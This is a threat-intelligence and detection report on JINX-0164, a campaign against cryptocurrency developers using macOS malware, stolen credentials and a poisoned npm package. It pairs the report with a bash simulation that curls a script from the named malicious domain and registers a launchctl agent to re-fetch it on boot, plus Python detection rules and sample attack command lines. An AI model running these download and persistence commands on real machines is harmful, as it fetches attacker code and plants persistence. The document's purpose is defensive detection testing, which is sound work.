Crypto Software Development Infrastructure Targeted by a New Threat Actor
Summary
A financially motivated threat actor tracked as JINX-0164 is targeting cryptocurrency developers through LinkedIn social engineering, macOS malware, and CI/CD compromise. The group deploys a custom Python RAT known as AUDIOFIX and a Go-based backdoor called MINIRAT, both configured to communicate with hard-coded command-and-control domains. After gaining access, the attackers steal cloud and development credentials, tamper with code repositories, and even publish malicious npm packages to expand access and enable cryptocurrency theft. The campaign reflects a sophisticated supply-chain threat aimed at the software development lifecycle.
Investigation
Wiz CIRT followed the intrusion from the initial LinkedIn outreach through malicious link delivery, execution of macOS payloads, theft of credentials, and lateral movement into source code repositories. Their investigation uncovered dropper scripts, persistence through launchctl, and the use of the nord-stream tool for secret exfiltration. Researchers also identified multiple spoofed domains, VPN exit nodes, and a supply-chain compromise involving the @velora-dex/sdk npm package. File paths, hashes, domains, and IP addresses were collected to support detection and threat hunting.
Mitigation
Recommended defenses include monitoring macOS systems for launchctl persistence, detecting suspicious LaunchAgents, and blocking the known malicious domains and command-and-control servers. Organizations should enforce signed commits, enable GitHub Vigilant Mode, and watch for unverified commits or unusual CI/CD workflow changes. VPN use should be limited to approved providers, and MFA should be required for cloud accounts and development platforms.
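The signed-commit check recommended above, as an added example (not part of the original report or any vendor tooling): it parses the tab-separated output of a git log format that exposes each commit's signature status and flags every commit that would fail a signed-commit policy. The sample log, SHAs and key IDs are constructed placeholders.

```python
# git log format assumed to produce the input (fields tab-separated):
#   git log --format='%H%x09%G?%x09%GK%x09%an' origin/main
# %G? codes: G good/trusted key, U good/untrusted key, N unsigned, B bad,
# X/Y expired signature/key, R revoked key, E signature could not be checked.
TRUSTED = {"G"}
GOOD_UNTRUSTED = {"U"}

def parse_signature_log(log_text):
    """Turn the tab-separated git log output into dicts (sha, status, key, author)."""
    rows = []
    for line in log_text.strip().splitlines():
        sha, status, key, author = line.split("\t", 3)
        rows.append({"sha": sha, "status": status, "key": key, "author": author})
    return rows

def unverified_commits(rows, accept_untrusted_key=False):
    """Commits that violate a signed-commit policy. By default only G passes;
    accept_untrusted_key=True also lets U through (valid signature, key not in the
    local trust db), which is common when keys live on the hosting platform."""
    allowed = TRUSTED | (GOOD_UNTRUSTED if accept_untrusted_key else set())
    return [r for r in rows if r["status"] not in allowed]

# Constructed sample output; the SHAs, key IDs and authors are placeholders.
SAMPLE_LOG = (
    "a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1\tG\tABCDEF0123456789\tdev-one\n"
    "b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2\tN\t\tci-bot\n"
    "c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3\tB\tDEADBEEF00000000\tdev-one\n"
    "d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4\tU\t0123456789ABCDEF\tdev-two\n"
)

def audit(log_text=SAMPLE_LOG, accept_untrusted_key=False):
    """Return (short sha, status, author) for every commit that fails the policy."""
    bad = unverified_commits(parse_signature_log(log_text), accept_untrusted_key)
    return [(r["sha"][:12], r["status"], r["author"]) for r in bad]
```

An unsigned commit from a CI identity (status N) is exactly the kind of entry worth reviewing after a CI/CD token has been stolen.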
Response
If this activity is detected, isolate the affected macOS system immediately, collect forensic artifacts, and revoke any compromised credentials and API tokens. Security teams should perform a full review of code repositories for malicious commits and remove any compromised npm packages. The identified command-and-control domains should be blocked, and firewall rules should be updated to deny traffic to the malicious IP addresses. Relevant stakeholders should be notified, and threat intelligence sharing with trusted industry partners should be considered.
Detections
- Suspicious File Download Direct IP (via proxy)
- Possible IP Lookup Domain Communications Attempted (via dns)
- MacOS Launchctl Execution Attempt (via cmdline)
- Possible Execution by Use of chmod and nohup in Single Command (via cmdline)
- Possible Base64 Encoded Strings Manipulation [MacOS] (via cmdline)
- Suspicious Curl Execution Attempt [MacOS] (via cmdline)
- IOCs (HashSha256) to detect: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
- IOCs (SourceIP) to detect: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
- IOCs (DestinationIP) to detect: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
- Detection of AUDIOFIX Malware Persistence and Payload Download [Linux Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) that is designed to trigger the detection rule. The commands and narrative must directly reflect the identified TTPs and generate the exact telemetry the detection logic expects.
Attack Narrative & Commands:
- Initial foothold: An attacker delivers a phishing email containing a malicious link (T1566.004). The victim clicks the link, which points to https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh.
- Payload download: The victim's terminal executes a curl command that silently fetches the script.
- Persistence setup: The script registers a launch agent using launchctl submit, embedding the same curl command so the payload is re-downloaded on each boot (T1546.006).
- Execution: The launch agent runs with system privileges, executing the downloaded script to compromise the host.
Regression Test Script: (run on a test macOS machine; requires admin rights)
#!/bin/bash
set -euo pipefail
# 1. Simulate the malicious curl download. The URL is the IoC domain named in the
#    narrative above; this script never executes the fetched file. The curl process
#    event is the telemetry under test, so a failed fetch must not abort the script.
MALICIOUS_URL="https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh"
curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh || true
# 2. Register a launch agent that re-downloads the script on boot.
#    launchctl submit takes -l LABEL and, after "--", the command line to run.
launchctl submit -l com.malicious.audiofix -- /usr/bin/curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh
echo "Malicious launch agent registered. Check SIEM for detection."
Cleanup Commands:
# Remove the launch agent
launchctl remove com.malicious.audiofix || true
# Delete the downloaded script
rm -f /tmp/audio-fix.sh
echo "Cleanup complete."
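Detection logic for the command-line telemetry the regression test and narrative above generate, as an added example that is not part of the original report or of the listed detection rules. It applies rules of the same shape as the cmdline detections above (launchctl persistence carrying a downloader, chmod and nohup in one command, base64 decoding piped to a shell, curl to a direct IP or into /tmp) to constructed process-creation events; the domain is the one from the narrative, the other values are made up.

```python
import re

# The domain is the one named in the attack narrative above; the remaining patterns
# are generic forms of the behaviours the listed cmdline detections look for.
IOC_DOMAINS = {"apple.driver-update.io"}
DIRECT_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/|\s|$)")
TMP_OUTPUT = re.compile(r"(?:-o|--output)\s+/(?:private/)?(?:var/)?tmp/")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b")
BASE64_DECODE = re.compile(r"\bbase64\b[^|]*(?:-d|-D|--decode)\b")

def detect(event):
    """Return the names of the checks one process-creation event matches.
    event: {'process': image basename, 'cmdline': full command line}."""
    proc, cmd = event["process"], event["cmdline"]
    lower, hits = cmd.lower(), []
    if any(d in lower for d in IOC_DOMAINS):
        hits.append("ioc_domain_in_cmdline")
    if proc == "curl":
        if DIRECT_IP_URL.search(cmd):
            hits.append("curl_direct_ip_download")
        if TMP_OUTPUT.search(cmd) or PIPE_TO_SHELL.search(cmd):
            hits.append("curl_download_to_tmp_or_shell")
    # launchctl submit/load/bootstrap whose own arguments carry a downloader or decoder
    words = cmd.split()
    if proc == "launchctl" and len(words) > 1 and words[1] in ("submit", "load", "bootstrap"):
        if re.search(r"\b(?:curl|wget|base64|osascript)\b", lower):
            hits.append("launchctl_persistence_with_download")
    if re.search(r"\bchmod\b", cmd) and re.search(r"\bnohup\b", cmd):
        hits.append("chmod_nohup_single_command")
    if BASE64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        hits.append("base64_decode_piped_to_shell")
    return hits

def scan(events):
    """Return [(index, hits)] for every event that matched at least one check."""
    return [(i, h) for i, e in enumerate(events) if (h := detect(e))]

URL = "https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh"
# Constructed process-creation events mirroring the regression test and its narrative.
SAMPLE_EVENTS = [
    {"process": "curl", "cmdline": f"curl -fsSL {URL} -o /tmp/audio-fix.sh"},
    {"process": "launchctl", "cmdline": f"launchctl submit -l com.malicious.audiofix -- /usr/bin/curl -fsSL {URL} -o /tmp/audio-fix.sh"},
    {"process": "sh", "cmdline": "sh -c 'chmod +x /tmp/audio-fix.sh && nohup /tmp/audio-fix.sh >/dev/null 2>&1 &'"},
    {"process": "bash", "cmdline": 'bash -c "echo aGVsbG8= | base64 -d | sh"'},
    {"process": "curl", "cmdline": "curl http://203.0.113.10:8080/update.bin -o /tmp/u.bin"},
    {"process": "curl", "cmdline": "curl -s https://api.github.com/repos/example/repo"},  # benign
    {"process": "launchctl", "cmdline": "launchctl list"},                                   # benign
]
```

Feeding the regression test's telemetry through `scan(SAMPLE_EVENTS)` should produce hits for the first five events and none for the two benign ones; a missing hit points at a gap between the rule and the telemetry source.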
End of Report